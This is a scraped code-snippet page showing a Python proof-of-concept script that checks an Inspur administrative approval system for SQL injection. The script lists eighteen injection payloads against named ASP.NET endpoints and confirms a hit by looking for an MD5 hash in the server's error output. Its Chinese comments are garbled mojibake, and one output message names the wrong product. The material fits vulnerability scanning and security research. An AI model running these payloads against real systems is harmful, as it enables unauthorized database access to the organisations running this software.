Join the 1-day Testing & QA Summit featuring 15+ Expert Speakers.Register for FREE! Join TestMu Conference

How to use viewSource method in fMBT

Best Python code snippet using fMBT_python

inspur_multi_sqli.py

Source:inspur_multi_sqli.py

1#!/usr/bin/env python2# -*- coding: utf-8 -*-3'''4name: æµªæ½®è¡æ¿å®¡æ¹ç³»ç»åå«å¤æ³¨å¥5referer: http://www.wooyun.org/bugs/wooyun-2015-01284776author: Lucifer7description: å¤å¤æ³¨å¥ã8'''9import sys10import requests11import warnings12from termcolor import cprint13class inspur_multi_sqli_BaseVerify:14    def __init__(self, url):15        self.url = url16    def run(self):17        headers = {18            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"19            }20        payloads = ["/Login/Log.aspx?loginname=%27/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--",21                    "/Bulletin/BusinessView.aspx?infoflowId=00003%27/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--",22                    "/ViewSource/SrcWorkProgram.aspx?infoflowId=00003%27/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--",23                    "/Bulletin/ColumnList.aspx?LanMuId=%27/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--",24                    "/OnlineQuery/GetFlowItem.aspx?DeptId=%27/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--",25                    "/ViewSource/SrcFormList.aspx?listType=&infoflowId=00003%27/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--&SerailNO=",26                    "/ViewSource/FujianDownLoad.aspx?Id=1/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--",27                    "/ViewSource/SrcNotice.aspx?infoflowId=00003%27/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--",28                    "/Bulletin/QAList.aspx?infoflowId=1'/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--&AspxAutoDetectCookieSupport=1",29                    "/Bulletin/PolicyDownLoad.aspx?ID=1'/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--",30                    "/Bulletin/PolicyList.aspx?infoflowId=00003'/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--&AspxAutoDetectCookieSupport=1",31                    "/login/TransactList.aspx?ItemName=1'/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--",32                    "/Broadcast/displayNewsPic.aspx?id=00357'/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--",33                    "/Bulletin/DocmentDownload.aspx?ID=00247'/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--",34                    "/LeaderMail/MailDetail.aspx?QueryId=11'/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--",35                    "/ViewSource/SrcPrintList.aspx?SerailNO='/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--",36                    "/Business/OfflineDownload.aspx?formId=BBQB'/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--&filetype=html&infoflowId=00263",37                    "/ViewSource/ProExamineView.aspx?ActivityInstanceId=&ActivitySchemeGuid=9a0b1f9e-d564-4ec9-945f-600b5a4dd2ed'/**/and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))/**/--"]38        noexist = True39        try:40            for payload in payloads:41                vulnurl = self.url + payload42                req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)43                if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:44                    cprint("[+]åå¨qibocmsç¥éç³»ç»æ³¨å¥æ¼æ´...(é«å±)\tpayload: "+vulnurl, "red")45                    noexist = False46            if noexist:47                cprint("[-]ä¸åå¨inspur_multi_sqliæ¼æ´", "white", "on_grey")48        except:49            cprint("[-] "+__file__+"====>å¯è½ä¸åå¨æ¼æ´", "cyan")50if __name__ == "__main__":51    warnings.filterwarnings("ignore")52    testVuln = inspur_multi_sqli_BaseVerify(sys.argv[1])...

Automation Testing Tutorials

Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.